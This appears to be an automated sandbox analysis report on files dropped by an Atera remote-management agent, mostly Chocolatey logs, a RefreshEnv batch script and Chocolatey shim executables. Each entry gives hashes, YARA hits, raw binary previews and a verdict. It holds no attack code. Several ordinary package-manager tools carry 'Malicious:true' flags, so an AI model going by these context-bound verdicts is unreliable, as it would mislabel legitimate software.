                                                                                                                                                                                                                                        MD5:D641F0413114BC5D950398233DE9E8B5
                                                                                                                                                                                                                                        SHA1:5CF9E88C15304D2ACC533E805D08CF83DF1FD7E4
                                                                                                                                                                                                                                        SHA-256:22AC63FFB8D0C68E18CE746D6451C188A8A5FA14BC16982D9A05FD31E9E98FE7
                                                                                                                                                                                                                                        SHA-512:17AE30B7CA6010503A067A490D873E3DF2E497C9C20A5A6E8FAD3D79B485B701DB709F147FE22C677CCEAC6386841109C6E30E57C80B86210E8FE6E55393A55D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\logs\choco.summary.log, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:2024-12-17 12:46:45,697 7284 [WARN ] - Directory 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lib' does not exist...2024-12-17 12:46:45,962 7284 [WARN ] - Enabled allowGlobalConfirmation..2024-12-17 12:46:46,103 7284 [WARN ] - Directory 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lib' does not exist...2024-12-17 12:46:46,337 7284 [WARN ] - 0 packages installed...2024-12-17 12:46:46,384 7284 [WARN ] - Directory 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lib' does not exist...2024-12-17 12:46:46,415 7284 [INFO ] - Outdated Packages.. Output is package name | current version | available version | pinned?....2024-12-17 12:46:46,509 7284 [WARN ] - ..Chocolatey has determined 0 package(s) are outdated. ..2024-12-17 12:46:56,487 7284 [WARN ] - Directory 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lib' does not exist

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\logs\chocolatey.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17921
                                                                                                                                                                                                                                        Entropy (8bit):5.495381083064792
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:aSe2sJROSgNlcz/IklXtozfki5IMPrqbNz+5ncI9zA4UEL8gGRq1viCs2AdC5CzY:aSYah+C/jG083C5CzzhdIlH4AGRx90
                                                                                                                                                                                                                                        MD5:48081DBDB39DCEE7C388B5D86895EC17
                                                                                                                                                                                                                                        SHA1:90832701E3CED3283226B5C3D03126755CCCE391
                                                                                                                                                                                                                                        SHA-256:2A29839F6E2984B2047AE9DE9BF0E5D3A02982246F5BD9B48F7A39905B898B9C
                                                                                                                                                                                                                                        SHA-512:2D3AB0F84B13EF05D1DEA5ABA221571C18DDBCDE9E8223176C66050F36969C752CC0386B6B981D9CB546FD28347E9A8B684E89D49AD2890F952B417DA649A177
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\logs\chocolatey.log, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:2024-12-17 12:59:46,332 7284 [INFO ] - GoogleChrome 131.0.6778.140 [Approved] Downloads cached for licensed users..2024-12-17 12:59:46,347 7284 [INFO ] - ninja 1.12.1 [Approved]..2024-12-17 12:59:46,347 7284 [INFO ] - google-chrome-for-enterprise 120.0.6099.225 [Approved]..2024-12-17 12:59:46,347 7284 [INFO ] - vnc-viewer 7.7.0 [Approved] Downloads cached for licensed users..2024-12-17 12:59:46,363 7284 [INFO ] - keepassxc 2.7.9 [Approved]..2024-12-17 12:59:46,363 7284 [INFO ] - GoogleChrome-AllUsers 120.0.6099.225 [Approved]..2024-12-17 12:59:46,363 7284 [INFO ] - google-chrome-x64 47.0.2526.81 [Approved] - Possibly broken..2024-12-17 12:59:46,363 7284 [INFO ] - keepass-keepasshttp 1.8.4.220170629 [Approved]..2024-12-17 12:59:46,379 7284 [INFO ] - selenium-chrome-driver 114.0.5735.90 [Approved]..2024-12-17 12:59:46,379 7284 [INFO ] - bleachbit 4.6.2 [Approved]..2024-12-17 12:59:46,379 7284 [INFO ] - bleachbit.install 4.6.2 [Approved]..2024-12-17 12:59:53,888 7284 [INFO ] - setdefaultb

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\RefreshEnv.cmd

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2340
                                                                                                                                                                                                                                        Entropy (8bit):5.120693108028518
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:WJhzy3v9zec4JksG5A10JZ65RhS9JlqUp7B9nplD6e7B5yg:42V6Q5A1B5C9L/
                                                                                                                                                                                                                                        MD5:B4326546C3A252494DCD512976F8B89A
                                                                                                                                                                                                                                        SHA1:09D10EA0ABDBDE8C2B5BAFE410ED3B96AB0076C8
                                                                                                                                                                                                                                        SHA-256:9B251737A6B6ACE9FDE45B64FD653B04575C6416F15112FBE1697A47B14990E6
                                                                                                                                                                                                                                        SHA-512:E58EDC6DC66A289358E7FDE7C3F1D73A0EE1F7A6DB382DD1318FAA205E12271C081617B8366ECD1FCB3A0BC5A98F4B0F0C389C99A63D9EDF7CE1BD230AC85EC2
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:@echo off..::..:: RefreshEnv.cmd..::..:: Batch file to read environment variables from registry and..:: set session variables to these values...::..:: With this batch file, there should be no need to reload command..:: environment every time you want environment changes to propagate....::echo "RefreshEnv.cmd only works from cmd.exe, please install the Chocolatey Profile to take advantage of refreshenv from PowerShell"..echo | set /p dummy="Refreshing environment variables from registry for cmd.exe. Please wait..."....goto main....:: Set one environment variable from registry key..:SetFromReg.. "%WinDir%\System32\Reg" QUERY "%~1" /v "%~2" > "%TEMP%\_envset.tmp" 2>NUL.. for /f "usebackq skip=2 tokens=2,*" %%A IN ("%TEMP%\_envset.tmp") do (.. echo/set "%~3=%%B".. ).. goto :EOF....:: Get a list of environment variables from registry..:GetRegEnv.. "%WinDir%\System32\Reg" QUERY "%~1" > "%TEMP%\_envget.tmp".. for /f "usebackq skip=2" %%A IN ("%TEMP%\_envget.tmp") do (

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\choco.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):136704
                                                                                                                                                                                                                                        Entropy (8bit):5.174853806484254
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:ED98HpKI6GCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:Y9GpKbShcHUa
                                                                                                                                                                                                                                        MD5:DDD072DBD2267BCB3081340E57ED092B
                                                                                                                                                                                                                                        SHA1:04EC398A1DE53DC960A882363A528E162350C57C
                                                                                                                                                                                                                                        SHA-256:460F604144DD93A3794F75C9E09B2676D7AD1295CD92499FAD80ED3C27990F02
                                                                                                                                                                                                                                        SHA-512:2271C5846254EAA7389D23EE0241814D06D34257A7B6D44FE7CBEA14F3ACA5101457FAD934B22D2B9B49F1263BCB4209D8EADC07DB93E2B5E01CCDA5BD6ED2A8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)$/b.................D...........c... ........@.. ....................................@..................................c..S.......X....................`....................................................... ............... ..H............text....C... ...D.................. ..`.rsrc...X............F..............@..@.reloc.......`......................@..B.................c......H....... ...x5...........................................................~....*.......*..(....*..0..%.......r...p..........{#.......{$.....()...*.r%..p*.0..........s+......}#.....}$...rk..p...,...s....((......{#....{$...s.......o......o......o......o......o......o......o........,R(....o....o ....2@rk..p~....-........s.........~....((.....o.....ru..po!.....o....s"...%(......(.....o#...(....o$...&..,.(....o%...(....o&...,.(....o'........,...o(.....*.........=.........(....*..(.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\choco.exe.ignore

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:y:y
                                                                                                                                                                                                                                        MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                        SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                                                        SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                        SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\chocolatey.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):137216
                                                                                                                                                                                                                                        Entropy (8bit):5.162895637606263
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:KMU90HpKOrGCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:K59OpKgShcHUa
                                                                                                                                                                                                                                        MD5:0BCC21AC34291B167EC4D73079EAE085
                                                                                                                                                                                                                                        SHA1:BAEF2A7349E2C6269BBF2C8C6654C492683FC73E
                                                                                                                                                                                                                                        SHA-256:14288199533B10CAD97F5917447979BBC4685F20255AA073EC1BB828D3CF6A2C
                                                                                                                                                                                                                                        SHA-512:9B7CC423E4F27DFF6006425311A6CC39CBA9CB5D3D4966C81FDA21C5907A434B6A748A92B65229A01A65440D8BA2D87D9E8C99CE80E2062569232A10AE74F9BA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*$/b.................F...........c... ........@.. ....................................@..................................c..W.......p....................`....................................................... ............... ..H............text....D... ...F.................. ..`.rsrc...p............H..............@..@.reloc.......`......................@..B.................c......H....... ....5...........................................................~....*.......*..(....*..0..%.......r...p..........{#.......{$.....()...*.r%..p*.0..........s+......}#.....}$...rk..p...,...s....((......{#....{$...s.......o......o......o......o......o......o......o........,R(....o....o ....2@rk..p~....-........s.........~....((.....o.....ru..po!.....o....s"...%(......(.....o#...(....o$...&..,.(....o%...(....o&...,.(....o'........,...o(.....*.........=.........(....*..(.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\chocolatey.exe.ignore

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:y:y
                                                                                                                                                                                                                                        MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                        SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                                                        SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                        SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cinst.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):137216
                                                                                                                                                                                                                                        Entropy (8bit):5.162623164553414
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:1w9mHpKZNGCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:C9UpK7ShcHUa
                                                                                                                                                                                                                                        MD5:55CC3EA23C5430BE7B5A75A52157DA18
                                                                                                                                                                                                                                        SHA1:AB1D482F2B5E7E0DAD31EA18B78D5F8EA849B87D
                                                                                                                                                                                                                                        SHA-256:BE0494DC91E38456E22692F3AB1891C56871FB82A83ADFDC58F8F890141ECEC9
                                                                                                                                                                                                                                        SHA-512:C09E0476E2D1F69A878195A4026954C5D74C0B5318254A60ABC5909F00A60CCE86D49D29BBF1ECAE498BCE0C2FD2551EFEF0FE287DAB7EAD2FE573CCC833CF3E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...+$/b.................F...........d... ........@.. ....................................@..................................c..S.......X....................`....................................................... ............... ..H............text....D... ...F.................. ..`.rsrc...X............H..............@..@.reloc.......`......................@..B.................c......H....... ....5...........................................................~....*.......*..(....*..0..%.......r...p..........{#.......{$.....()...*.r%..p*.0..........s+......}#.....}$...rk..p...,...s....((......{#....{$...s.......o......o......o......o......o......o......o........,R(....o....o ....2@rk..p~....-........s.........~....((.....o.....ru..po!.....o....s"...%(......(.....o#...(....o$...&..,.(....o%...(....o&...,.(....o'........,...o(.....*.........=.........(....*..(.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cinst.exe.ignore

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:y:y
                                                                                                                                                                                                                                        MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                        SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                                                        SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                        SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\clist.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):137216
                                                                                                                                                                                                                                        Entropy (8bit):5.162059784215363
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:YE9tHpKrvGCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:795pK7ShcHUa
                                                                                                                                                                                                                                        MD5:4E2DC776C653ADBEBCF5DB16AB53296E
                                                                                                                                                                                                                                        SHA1:290457CFC7EC45A493CCEACD2CA24A47237494C1
                                                                                                                                                                                                                                        SHA-256:2DCB2236BB84AE42F4395E72EC67A22CBE0E68ADA4F80FABD7141B5B3D4E7985
                                                                                                                                                                                                                                        SHA-512:533B424AFD7E5BF831BB72164D91B663A2368D458A3EFFFF7062A15D1AB77585C087FA5A5471D3530CCF30309AC30C35EAA4A9168A350071A64E912E15012311
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,$/b.................F...........c... ........@.. ....................................@..................................c..O.......X....................`....................................................... ............... ..H............text....D... ...F.................. ..`.rsrc...X............H..............@..@.reloc.......`......................@..B.................c......H....... ....5...........................................................~....*.......*..(....*..0..%.......r...p..........{#.......{$.....()...*.r%..p*.0..........s+......}#.....}$...rk..p...,...s....((......{#....{$...s.......o......o......o......o......o......o......o........,R(....o....o ....2@rk..p~....-........s.........~....((.....o.....ru..po!.....o....s"...%(......(.....o#...(....o$...&..,.(....o%...(....o&...,.(....o'........,...o(.....*.........=.........(....*..(.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\clist.exe.ignore

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:y:y
                                                                                                                                                                                                                                        MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                        SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                                                        SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                        SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cpush.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):137216
                                                                                                                                                                                                                                        Entropy (8bit):5.162082250130723
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:GI9KHpKHDGCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:l9QpKjShcHUa
                                                                                                                                                                                                                                        MD5:76385C4CF0842546103EDD75662BDAD7
                                                                                                                                                                                                                                        SHA1:BC42B5817E6BB3568CC6D7C0BD2B03E8B723024B
                                                                                                                                                                                                                                        SHA-256:67EB4084D0BD361C42FFD7AF025167BAFCE8496A35CA6616945E0942386C6424
                                                                                                                                                                                                                                        SHA-512:BAB9B5AE9B89697A7FA83D0D29A4DB0B777F126EEC8DF3BAE9B009AF9A0D556BB79BF2DCED1D26C7A8E900AC5AA7DDE07CEC334DA6418925F352554383F77EC2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....$/b.................F...........c... ........@.. ....................................@..................................c..O.......X....................`....................................................... ............... ..H............text....D... ...F.................. ..`.rsrc...X............H..............@..@.reloc.......`......................@..B.................c......H....... ....5...........................................................~....*.......*..(....*..0..%.......r...p..........{#.......{$.....()...*.r%..p*.0..........s+......}#.....}$...rk..p...,...s....((......{#....{$...s.......o......o......o......o......o......o......o........,R(....o....o ....2@rk..p~....-........s.........~....((.....o.....ru..po!.....o....s"...%(......(.....o#...(....o$...&..,.(....o%...(....o&...,.(....o'........,...o(.....*.........=.........(....*..(.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cpush.exe.ignore

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:y:y
                                                                                                                                                                                                                                        MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                        SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                                                        SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                        SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cuninst.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):137216
                                                                                                                                                                                                                                        Entropy (8bit):5.163276282537277
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:pS791HpKIqGCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:pO9xpKbShcHUa
                                                                                                                                                                                                                                        MD5:5C9628C46256D0F6B14DE2168CBED8CC
                                                                                                                                                                                                                                        SHA1:B7284385B0076623B76EC3FB2398B5EE8F3B9F85
                                                                                                                                                                                                                                        SHA-256:354C3758A1F9E5A39E7292E9CCA353F815358977B3CC9A704BCEAB257AC6C24C
                                                                                                                                                                                                                                        SHA-512:84886CF1632EFA70D8023F99A663E809422DFCC1C566793EF52078551DA105BFF1B2F9D54E197D8CCE53C3C725226635D623D9D539B5BFD4C17C802286EFADB4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../$/b.................F...........d... ........@.. ....................................@..................................c..W.......`....................`....................................................... ............... ..H............text...$D... ...F.................. ..`.rsrc...`............H..............@..@.reloc.......`......................@..B.................d......H....... ....5...........................................................~....*.......*..(....*..0..%.......r...p..........{#.......{$.....()...*.r%..p*.0..........s+......}#.....}$...rk..p...,...s....((......{#....{$...s.......o......o......o......o......o......o......o........,R(....o....o ....2@rk..p~....-........s.........~....((.....o.....ru..po!.....o....s"...%(......(.....o#...(....o$...&..,.(....o%...(....o&...,.(....o'........,...o(.....*.........=.........(....*..(.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cuninst.exe.ignore

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:y:y
                                                                                                                                                                                                                                        MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                        SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                                                        SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                        SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cup.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):137216
                                                                                                                                                                                                                                        Entropy (8bit):5.162239721051707
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:TR9vHpKmEGCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:F9/pKvShcHUa
                                                                                                                                                                                                                                        MD5:8783ED37D6871AE20E4A65A655788A7E
                                                                                                                                                                                                                                        SHA1:C42F5B032CF27FFC36869C22D5BE0363AC2E5AF4
                                                                                                                                                                                                                                        SHA-256:5AFEF49A1BB85ED16EE7EF08D9ED694F166A9500701728770E50E92978566C5B
                                                                                                                                                                                                                                        SHA-512:1FE424147DBAD7978F0C856D152F3236685C52DBCA5DD6AB7A03E5D1B8A08566FDF4574C4704FBEDF286A4C13B354D771E25D1B725D55578C14E9EAB2D8F9898
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0$/b.................F...........d... ........@.. ....................................@..................................c..W.......P....................`....................................................... ............... ..H............text....D... ...F.................. ..`.rsrc...P............H..............@..@.reloc.......`......................@..B.................c......H....... ....5...........................................................~....*.......*..(....*..0..%.......r...p..........{#.......{$.....()...*.r%..p*.0..........s+......}#.....}$...rk..p...,...s....((......{#....{$...s.......o......o......o......o......o......o......o........,R(....o....o ....2@rk..p~....-........s.........~....((.....o.....ru..po!.....o....s"...%(......(.....o#...(....o$...&..,.(....o%...(....o&...,.(....o'........,...o(.....*.........=.........(....*..(.

